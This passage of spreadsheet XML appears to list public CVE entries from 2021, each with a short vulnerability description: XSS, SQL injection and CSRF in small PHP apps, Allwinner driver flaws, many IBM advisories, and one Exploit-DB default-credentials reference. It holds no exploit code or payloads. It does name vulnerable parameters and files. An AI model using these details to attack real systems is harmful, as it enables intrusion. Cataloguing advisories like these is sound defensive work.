    <t>Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.</t>
  </si>
  <si>
    <t>CVE-2021-38704</t>
  </si>
  <si>
    <t>Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.</t>
  </si>
  <si>
    <t>CVE-2021-38705</t>
  </si>
  <si>
    <t>ClinicCases 7.3.3 is affected by Cross-Site Request Forgery (CSRF). A successful attack would consist of an authenticated user following a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user. This can be exploited to create a secondary administrator account for the attacker.</t>
  </si>
  <si>
    <t>CVE-2021-38706</t>
  </si>
  <si>
    <t>messages_load.php in ClinicCases 7.3.3 suffers from a blind SQL injection vulnerability, which allows low-privileged attackers to execute arbitrary SQL commands through a vulnerable parameter.</t>
  </si>
  <si>
    <t>CVE-2021-38707</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow low-privileged attackers to introduce arbitrary JavaScript to account parameters. The XSS payloads will execute in the browser of any user who views the relevant content. This can result in account takeover via session token theft.</t>
  </si>
  <si>
    <t>CVE-2021-38708</t>
  </si>
  <si>
    <t>In ocProducts Composr CMS before 10.0.38, an attacker can inject JavaScript via Comcode for XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38709</t>
  </si>
  <si>
    <t>In ocProducts Composr CMS before 10.0.38, an attacker can inject JavaScript via the staff_messaging messaging system for XSS.</t>
  </si>
  <si>
    <t>CVE-2021-38710</t>
  </si>
  <si>
    <t>Static (Persistent) XSS Vulnerability exists in version 4.3.0 of Yclas when using the install/view/form.php script. An attacker can store XSS in the database through the vulnerable SITE_NAME parameter.</t>
  </si>
  <si>
    <t>CVE-2021-38711</t>
  </si>
  <si>
    <t>In gitit before 0.15.0.0, the Export feature can be exploited to leak information from files.</t>
  </si>
  <si>
    <t>CVE-2021-38712</t>
  </si>
  <si>
    <t>OneNav 0.9.12 allows Information Disclosure of the onenav.db3 contents. NOTE: the vendor's recommended solution is to block the access via an NGINX configuration file.</t>
  </si>
  <si>
    <t>CVE-2021-38713</t>
  </si>
  <si>
    <t>imgURL 2.31 allows XSS via an X-Forwarded-For HTTP header.</t>
  </si>
  <si>
    <t>CVE-2021-38714</t>
  </si>
  <si>
    <t>In Plib through 1.85, there is an integer overflow vulnerability that could result in arbitrary code execution. The vulnerability is found in ssgLoadTGA() function in src/ssg/ssgLoadTGA.cxx file.</t>
  </si>
  <si>
    <t>CVE-2021-3872</t>
  </si>
  <si>
    <t>CVE-2021-38721</t>
  </si>
  <si>
    <t>FUEL CMS 1.5.0 login.php contains a cross-site request forgery (CSRF) vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38723</t>
  </si>
  <si>
    <t>FUEL CMS 1.5.0 allows SQL Injection via parameter 'col' in /fuel/index.php/fuel/pages/items</t>
  </si>
  <si>
    <t>CVE-2021-38725</t>
  </si>
  <si>
    <t>Fuel CMS 1.5.0 has a brute force vulnerability in fuel/modules/fuel/controllers/Login.php</t>
  </si>
  <si>
    <t>CVE-2021-38727</t>
  </si>
  <si>
    <t>FUEL CMS 1.5.0 allows SQL Injection via parameter 'col' in /fuel/index.php/fuel/logs/items</t>
  </si>
  <si>
    <t>CVE-2021-38728</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to Cross Site Scripting (XSS) via Ant_M_Coup.php.</t>
  </si>
  <si>
    <t>CVE-2021-38729</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Plist.php.</t>
  </si>
  <si>
    <t>CVE-2021-38730</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Info.php.</t>
  </si>
  <si>
    <t>CVE-2021-38731</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Zekou.php.</t>
  </si>
  <si>
    <t>CVE-2021-38732</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL via Ant_Message.php.</t>
  </si>
  <si>
    <t>CVE-2021-38733</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_BlogCat.php.</t>
  </si>
  <si>
    <t>CVE-2021-38734</t>
  </si>
  <si>
    <t>SEMCMS SHOP v 1.1 is vulnerable to SQL Injection via Ant_Menu.php.</t>
  </si>
  <si>
    <t>CVE-2021-38736</t>
  </si>
  <si>
    <t>SEMCMS Shop V 1.1 is vulnerable to SQL Injection via Ant_Global.php.</t>
  </si>
  <si>
    <t>CVE-2021-38737</t>
  </si>
  <si>
    <t>SEMCMS v 1.1 is vulnerable to SQL Injection via Ant_Pro.php.</t>
  </si>
  <si>
    <t>CVE-2021-3874</t>
  </si>
  <si>
    <t>bookstack is vulnerable to Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</t>
  </si>
  <si>
    <t>CVE-2021-38745</t>
  </si>
  <si>
    <t>Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.</t>
  </si>
  <si>
    <t>CVE-2021-3875</t>
  </si>
  <si>
    <t>exploits/linux/remote/50576.py</t>
  </si>
  <si>
    <t>Raspberry Pi 5.10 - Default Credentials</t>
  </si>
  <si>
    <t>2021-12-09</t>
  </si>
  <si>
    <t>CVE-2021-38751</t>
  </si>
  <si>
    <t>A HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value, leading to a possible attack vector for MITM.</t>
  </si>
  <si>
    <t>CVE-2021-38752</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Online Catering Reservation System using PHP on Sourcecodester allows an attacker to arbitrarily inject code in the search bar.</t>
  </si>
  <si>
    <t>CVE-2021-38753</t>
  </si>
  <si>
    <t>An unrestricted file upload on Simple Image Gallery Web App can be exploited to upload a web shell and executed to gain unauthorized access to the server hosting the web app.</t>
  </si>
  <si>
    <t>CVE-2021-38754</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Hospital Management System due to lack of input validation in messearch.php.</t>
  </si>
  <si>
    <t>CVE-2021-38755</t>
  </si>
  <si>
    <t>Unauthenticated doctor entry deletion in Hospital Management System in admin-panel1.php.</t>
  </si>
  <si>
    <t>CVE-2021-38756</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) in Hospital Management System targeted towards web admin through prescribe.php.</t>
  </si>
  <si>
    <t>CVE-2021-38757</t>
  </si>
  <si>
    <t>Persistent cross-site scripting (XSS) in Hospital Management System targeted towards web admin through contact.php.</t>
  </si>
  <si>
    <t>CVE-2021-38758</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in Online Catering Reservation System 1.0 exists due to lack of validation in index.php.</t>
  </si>
  <si>
    <t>CVE-2021-38759</t>
  </si>
  <si>
    <t>Raspberry Pi OS through 5.10 has the raspberry default password for the pi account. If not changed, attackers can gain administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2021-38772</t>
  </si>
  <si>
    <t>Tenda AC10-1200 v15.03.06.23_EN was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.</t>
  </si>
  <si>
    <t>CVE-2021-3878</t>
  </si>
  <si>
    <t>CVE-2021-38783</t>
  </si>
  <si>
    <t>There is a Out-of-Bound Write in the Allwinner R818 SoC Android Q SDK V1.0 camera driver "/dev/cedar_dev" through iotcl cmd IOCTL_SET_PROC_INFO and IOCTL_COPY_PROC_INFO, which could cause a system crash or EoP.</t>
  </si>
  <si>
    <t>CVE-2021-38784</t>
  </si>
  <si>
    <t>There is a NULL pointer dereference in the syscall open_exec function of Allwinner R818 SoC Android Q SDK V1.0 that could executable a malicious file to cause a system crash.</t>
  </si>
  <si>
    <t>CVE-2021-38785</t>
  </si>
  <si>
    <t>There is a NULL pointer deference in the Allwinner R818 SoC Android Q SDK V1.0 camera driver /dev/cedar_dev that could use the ioctl cmd IOCTL_GET_IOMMU_ADDR to cause a system crash.</t>
  </si>
  <si>
    <t>CVE-2021-38786</t>
  </si>
  <si>
    <t>There is a NULL pointer dereference in media/libcedarc/vdecoder of Allwinner R818 SoC Android Q SDK V1.0, which could cause a media crash (denial of service).</t>
  </si>
  <si>
    <t>CVE-2021-38787</t>
  </si>
  <si>
    <t>There is an integer overflow in the ION driver "/dev/ion" of Allwinner R818 SoC Android Q SDK V1.0 that could use the ioctl cmd "COMPAT_ION_IOC_SUNXI_FLUSH_RANGE" to cause a system crash (denial of service).</t>
  </si>
  <si>
    <t>CVE-2021-38788</t>
  </si>
  <si>
    <t>The Background service in Allwinner R818 SoC Android Q SDK V1.0 is used to manage background applications. Malicious apps can use the interface provided by the service to set the number of applications allowed to run in the background to 0 and add themselves to the whitelist, so that once other applications enter the background, they will be forcibly stopped by the system, causing a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-38789</t>
  </si>
  <si>
    <t>Allwinner R818 SoC Android Q SDK V1.0 is affected by an incorrect access control vulnerability that does not check the caller's permission, in which a third-party app could change system settings.</t>
  </si>
  <si>
    <t>CVE-2021-3879</t>
  </si>
  <si>
    <t>CVE-2021-3881</t>
  </si>
  <si>
    <t>libmobi is vulnerable to Out-of-bounds Read</t>
  </si>
  <si>
    <t>CVE-2021-38819</t>
  </si>
  <si>
    <t>A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page.</t>
  </si>
  <si>
    <t>CVE-2021-3882</t>
  </si>
  <si>
    <t>LedgerSMB does not set the 'Secure' attribute on the session authorization cookie when the client uses HTTPS and the LedgerSMB server is behind a reverse proxy. By tricking a user to use an unencrypted connection (HTTP), an attacker may be able to obtain the authentication data by capturing network traffic. LedgerSMB 1.8 and newer switched from Basic authentication to using cookie authentication with encrypted cookies. Although an attacker can't access the information inside the cookie, nor the password of the user, possession of the cookie is enough to access the application as the user from which the cookie has been obtained. In order for the attacker to obtain the cookie, first of all the server must be configured to respond to unencrypted requests, the attacker must be suitably positioned to eavesdrop on the network traffic between the client and the server *and* the user must be tricked into using unencrypted HTTP traffic. Proper audit control and separation of duties limit Integrity impact of the attack vector. Users of LedgerSMB 1.8 are urged to upgrade to known-fixed versions. Users of LedgerSMB 1.7 or 1.9 are unaffected by this vulnerability and don't need to take action. As a workaround, users may configure their Apache or Nginx reverse proxy to add the Secure attribute at the network boundary instead of relying on LedgerSMB. For Apache, please refer to the 'Header always edit' configuration command in the mod_headers module. For Nginx, please refer to the 'proxy_cookie_flags' configuration command.</t>
  </si>
  <si>
    <t>CVE-2021-38822</t>
  </si>
  <si>
    <t>A Stored Cross Site Scripting vulnerability via Malicious File Upload exists in multiple pages of IceHrm 30.0.0.OS that allows for arbitrary execution of JavaScript commands.</t>
  </si>
  <si>
    <t>CVE-2021-38823</t>
  </si>
  <si>
    <t>The IceHrm 30.0.0 OS website was found vulnerable to Session Management Issue. A signout from an admin account does not invalidate an admin session that is opened in a different browser.</t>
  </si>
  <si>
    <t>CVE-2021-38827</t>
  </si>
  <si>
    <t>Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 is vulnerable to account takeover.</t>
  </si>
  <si>
    <t>CVE-2021-38828</t>
  </si>
  <si>
    <t>Xiongmai Camera XM-JPR2-LX V4.02.R12.A6420987.10002.147502.00000 is vulnerable to plain-text traffic sniffing.</t>
  </si>
  <si>
    <t>CVE-2021-38833</t>
  </si>
  <si>
    <t>SQL injection vulnerability in PHPGurukul Apartment Visitors Management System (AVMS) v. 1.0 allows attackers to execute arbitrary SQL statements and to gain RCE.</t>
  </si>
  <si>
    <t>CVE-2021-38834</t>
  </si>
  <si>
    <t>easy-mock v1.5.0-v1.6.0 allows remote attackers to bypass the vm2 sandbox and execute arbitrary system commands through special js code.</t>
  </si>
  <si>
    <t>CVE-2021-38840</t>
  </si>
  <si>
    <t>SQL Injection can occur in Simple Water Refilling Station Management System 1.0 via the water_refilling/classes/Login.php username parameter.</t>
  </si>
  <si>
    <t>CVE-2021-38841</t>
  </si>
  <si>
    <t>Remote Code Execution can occur in Simple Water Refilling Station Management System 1.0 via the System Logo option on the system_info page in classes/SystemSettings.php with an update_settings action.</t>
  </si>
  <si>
    <t>CVE-2021-38847</t>
  </si>
  <si>
    <t>S-Cart v6.4.1 and below was discovered to contain an arbitrary file upload vulnerability in the Editor module on the Admin panel. This vulnerability allows attackers to execute arbitrary code via a crafted IMG file.</t>
  </si>
  <si>
    <t>CVE-2021-38862</t>
  </si>
  <si>
    <t>IBM Data Risk Manager (iDNA) 2.0.6 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 207980.</t>
  </si>
  <si>
    <t>CVE-2021-38863</t>
  </si>
  <si>
    <t>IBM Security Verify Bridge 1.0.5.0 stores user credentials in plain clear text which can be read by a locally authenticated user. IBM X-Force ID: 208154.</t>
  </si>
  <si>
    <t>CVE-2021-38864</t>
  </si>
  <si>
    <t>IBM Security Verify Bridge 1.0.5.0 could allow a user to obtain sensitive information due to improper certificate validation. IBM X-Force ID: 208155.</t>
  </si>
  <si>
    <t>CVE-2021-38868</t>
  </si>
  <si>
    <t>IBM Engineering Requirements Quality Assistant On-Premises (All versions) is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force Id: 208310.</t>
  </si>
  <si>
    <t>CVE-2021-38869</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 in some situations may not automatically log users out after they exceede their idle timeout. IBM X-Force ID: 208341.</t>
  </si>
  <si>
    <t>CVE-2021-38870</t>
  </si>
  <si>
    <t>IBM Aspera Cloud is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208343.</t>
  </si>
  <si>
    <t>CVE-2021-38871</t>
  </si>
  <si>
    <t>IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208345.</t>
  </si>
  <si>
    <t>CVE-2021-38872</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 10.0.2.0, 10.0.3.0, 10.0.1.0 through 10.0.1.4, and 2018.4.1.0 through 2018.4.1.17 could allow a remote user to cause a denial of service by consuming resources with multiple requests. IBM X-Force ID: 208348.</t>
  </si>
  <si>
    <t>CVE-2021-38873</t>
  </si>
  <si>
    <t>IBM Planning Analytics 2.0 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 208396.</t>
  </si>
  <si>
    <t>CVE-2021-38874</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 allows for users to access information across tenant and domain boundaries in some situations. IBM X-Force ID: 208397.</t>
  </si>
  <si>
    <t>CVE-2021-38875</t>
  </si>
  <si>
    <t>IBM MQ 8.0, 9.0 LTS, 9.1 LTS, 9.2 LTS, 9.1 CD, and 9.2 CD is vulnerable to a denial of service attack caused by an error processing messages. IBM X-Force ID: 208398.</t>
  </si>
  <si>
    <t>CVE-2021-38876</t>
  </si>
  <si>
    <t>IBM i 7.2, 7.3, and 7.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208404.</t>
  </si>
  <si>
    <t>CVE-2021-38877</t>
  </si>
  <si>
    <t>IBM Jazz for Service Management 1.1.3.10 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208405.</t>
  </si>
  <si>
    <t>CVE-2021-38878</t>
  </si>
  <si>
    <t>IBM QRadar 7.3, 7.4, and 7.5 could allow a malicious actor to impersonate an actor due to key exchange without entity authentication. IBM X-Force ID: 208756.</t>
  </si>
  <si>
    <t>CVE-2021-38879</t>
  </si>
  <si>
    <t>IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie. IBM X-Force ID: 209057.</t>
  </si>
  <si>
    <t>CVE-2021-3888</t>
  </si>
  <si>
    <t>libmobi is vulnerable to Use of Out-of-range Pointer Offset</t>
  </si>
  <si>
    <t>CVE-2021-38882</t>
  </si>
  <si>
    <t>IBM Spectrum Scale 5.1.0 through 5.1.1.1 could allow a privileged admin to destroy filesystem audit logging records before expiration time. IBM X-Force ID: 209164.</t>
  </si>
  <si>
    <t>CVE-2021-38883</t>
  </si>
  <si>
    <t>IBM Business Automation Workflow 18.0, 19.0, 20,0 and 21.0 and IBM Business Process Manager 8.5 and 8.6 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209165.</t>
  </si>
  <si>
    <t>CVE-2021-38886</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 209399.</t>
  </si>
  <si>
    <t>CVE-2021-38887</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information from application response requests that could be used in further attacks against the system. IBM X-Force ID: 209401.</t>
  </si>
  <si>
    <t>CVE-2021-3889</t>
  </si>
  <si>
    <t>CVE-2021-38890</t>
  </si>
  <si>
    <t>IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 209507.</t>
  </si>
  <si>
    <t>CVE-2021-38891</t>
  </si>
  <si>
    <t>IBM Sterling Connect:Direct Web Services 1.0 and 6.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 209508.</t>
  </si>
  <si>
    <t>CVE-2021-38893</t>
  </si>
  <si>
    <t>IBM Business Process Manager 8.5 and 8.6 and IBM Business Automation Workflow 18.0, 19.0, 20.0 and 21.0 are vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209512.</t>
  </si>
  <si>
    <t>CVE-2021-38894</t>
  </si>
  <si>
    <t>IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 209515.</t>
  </si>
  <si>
    <t>CVE-2021-38895</t>
  </si>
  <si>
    <t>IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209563.</t>
  </si>
  <si>
    <t>CVE-2021-38896</t>
  </si>
  <si>
    <t>IBM QRadar Advisor 2.5 through 2.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209566.</t>
  </si>
  <si>
    <t>CVE-2021-38899</t>
  </si>
  <si>
    <t>IBM Cloud Pak for Data 2.5 could allow a local user with special privileges to obtain highly sensitive information. IBM X-Force ID: 209575.</t>
  </si>
  <si>
    <t>CVE-2021-38900</t>
  </si>
  <si>
    <t>IBM Business Process Manager 8.5 and 8.6 and IBM Business Automation Workflow 18.0, 19.0, 20.0 and 21.0 could allow a privileged user to obtain highly sensitive information due to improper access controls. IBM X-Force ID: 209607.</t>
  </si>
  <si>
    <t>CVE-2021-38901</t>
  </si>
  <si>
    <t>IBM Spectrum Protect Operations Center 7.1, under special configurations, could allow a local user to obtain highly sensitive information. IBM X-Force ID: 209610.</t>
  </si>
  <si>
    <t>CVE-2021-38903</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. IBM X-Force ID: 209691.</t>
  </si>
  <si>
    <t>CVE-2021-38904</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 could allow a remote attacker to obtain credentials from a user's browser via incorrect autocomplete settings. IBM X-Force ID: 209693.</t>
  </si>
  <si>
    <t>CVE-2021-38905</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 could allow an authenticated user to view report pages that they should not have access to. IBM X-Force ID: 209697.</t>
  </si>
  <si>
    <t>CVE-2021-38909</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7 and 11.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 209706.</t>
  </si>
  <si>
    <t>CVE-2021-38910</t>
  </si>
  <si>
    <t>IBM DataPower Gateway V10CD, 10.0.1, and 2108.4.1 could allow a remote attacker to bypass security restrictions, caused by the improper validation of input. By sending a specially crafted JSON message, an attacker could exploit this vulnerability to modify structure and fields. IBM X-Force ID: 209824.</t>
  </si>
  <si>
    <t>CVE-2021-38911</t>
  </si>
  <si>
    <t>IBM Security Risk Manager on CP4S 1.7.0.0 stores user credentials in plain clear text which can be read by a an authenticatedl privileged user. IBM X-Force ID: 209940.</t>
  </si>
  <si>
    <t>CVE-2021-38915</t>
  </si>
  <si>
    <t>IBM Data Risk Manager 2.0.6 stores user credentials in plain clear text which can be read by an authenticated user. IBM X-Force ID: 209947.</t>
  </si>
  <si>
    <t>CVE-2021-38917</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW860, FW940, and FW950 could allow an attacker that gains service access to the FSP can read and write arbitrary host system memory through a series of carefully crafted service procedures. IBM X-Force ID: 210018.</t>
  </si>
  <si>
    <t>CVE-2021-38918</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW860, FW940, FW950, and FW1010, through a specific sequence of VM management operations could lead to a violation of the isolation between peer VMs. IBM X-Force ID: 210019.</t>
  </si>
  <si>
    <t>CVE-2021-38919</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 in some senarios may reveal authorized service tokens to other QRadar users. IBM X-Force ID: 210021</t>
  </si>
  <si>
    <t>CVE-2021-38921</t>
  </si>
  <si>
    <t>IBM Security Verify 10.0.0, 10.0.1.0, and 10.0.2.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 210067.</t>
  </si>
  <si>
    <t>CVE-2021-38923</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW1010 could allow a privileged user to gain access to another VM due to assigning duplicate WWPNs. IBM X-Force ID: 210162.</t>
  </si>
  <si>
    <t>CVE-2021-38924</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.1.1 and 7.6.1.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 210163.</t>
  </si>
  <si>
    <t>CVE-2021-38925</t>
  </si>
  <si>
    <t>IBM Sterling B2B Integrator Standard Edition 5.2.0. 0 through 6.1.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 210171.</t>
  </si>
  <si>
    <t>CVE-2021-38926</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5 could allow a local user to gain privileges due to allowing modification of columns of existing tasks. IBM X-Force ID: 210321.</t>
  </si>
  <si>
    <t>CVE-2021-38929</t>
  </si>
  <si>
    <t>IBM System Storage DS8000 Management Console (HMC) R8.5 88.5x.x.x, R9.1 89.1x.0.0, and R9.2 89.2x.0.0 could allow a remote attacker to obtain sensitive information through unpublished URLs. IBM X-Force ID: 210330.</t>
  </si>
  <si>
    <t>CVE-2021-38930</t>
  </si>
  <si>
    <t>IBM System Storage DS8000 Management Console (HMC) R8.5 88.5x.x.x, R9.1 89.1x.0.0, and R9.2 89.2x.0.0 could allow a remote attacker to obtain sensitive information through unpublished URLs. IBM X-Force ID: 210331.</t>
  </si>
  <si>
    <t>CVE-2021-38931</t>
  </si>
  <si>
    <t>IBM Db2 for Linux, UNIX and Windows (includes DB2 Connect Server) 11.1, and 11.5 is vulnerable to an information disclosure as a result of a connected user having indirect read access to a table where they are not authorized to select from. IBM X-Force ID: 210418.</t>
  </si>
  <si>
    <t>CVE-2021-38934</t>
  </si>
  <si>
    <t>IBM Engineering Test Management 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 210671.</t>
  </si>
  <si>
    <t>CVE-2021-38935</t>
  </si>
  <si>
    <t>IBM Maximo Asset Management 7.6.1.2 does not require that users should have strong passwords by default, which makes it easier for attackers to compromise user accounts. IBM X-Force ID: 210892.</t>
  </si>
  <si>
    <t>CVE-2021-38936</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 could disclose highly sensitive information to a privileged user. IBM X-Force ID: 210893.</t>
  </si>
  <si>
    <t>CVE-2021-38937</t>
  </si>
  <si>
    <t>IBM PowerVM Hypervisor FW940, FW950, and FW1010 could allow an authenticated user to cause the system to crash using a specially crafted IBMi Hypervisor call. IBM X-Force ID: 210894.</t>
  </si>
  <si>
    <t>CVE-2021-38939</t>
  </si>
  <si>
    <t>IBM QRadar SIEM 7.3, 7.4, and 7.5 stores potentially sensitive information in log files that could be read by an user with access to creating domains. IBM X-Force ID: 211037.</t>
  </si>
  <si>
    <t>CVE-2021-38941</t>
  </si>
  <si>
    <t>IBM CloudPak for Multicloud Monitoring 2.0 and 2.3 has a few containers running in privileged mode which is vulnerable to host information leakage or destruction if unauthorized access to these containers could execute arbitrary commands. IBM X-Force ID: 211048.</t>
  </si>
  <si>
    <t>CVE-2021-38944</t>
  </si>
  <si>
    <t>IBM DataPower Gateway 10.0.2.0 through 1.0.3.0, 10.0.1.0 through 10.0.1.5, and 2018.4.1.0 through 2018.4.1.18 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 211236.</t>
  </si>
  <si>
    <t>CVE-2021-38945</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.2.1, 11.2.0, and 11.1.7 could allow a remote attacker to upload arbitrary files, caused by improper content validation. IBM X-Force ID: 211238.</t>
  </si>
  <si>
    <t>CVE-2021-38946</t>
  </si>
  <si>
    <t>IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 211240.</t>
  </si>
  <si>
    <t>CVE-2021-38947</t>
  </si>
  <si>
    <t>IBM Spectrum Copy Data Management 2.2.13 and earlier uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 211242.</t>
  </si>
  <si>
    <t>CVE-2021-38948</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 211402.</t>
  </si>
  <si>
    <t>CVE-2021-38949</t>
  </si>
  <si>
    <t>IBM MQ 7.5, 8.0, 9.0 LTS, 9.1 CD, and 9.1 LTS stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 211403.</t>
  </si>
  <si>
    <t>CVE-2021-38950</t>
  </si>
  <si>
    <t>IBM MQ on HPE NonStop 8.0.4 and 8.1.0 is vulnerable to a privilege escalation attack when SharedBindingsUserId is set to effective. IBM X-ForceID: 211404.</t>
  </si>
  <si>
    <t>CVE-2021-38951</t>
  </si>
  <si>
    <t>IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume all available CPU resources. IBM X-Force ID: 211405.</t>
  </si>
  <si>
    <t>CVE-2021-38952</t>
  </si>
  <si>
    <t>IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 211408.</t>
  </si>
  <si>
    <t>CVE-2021-38954</t>
  </si>
  <si>
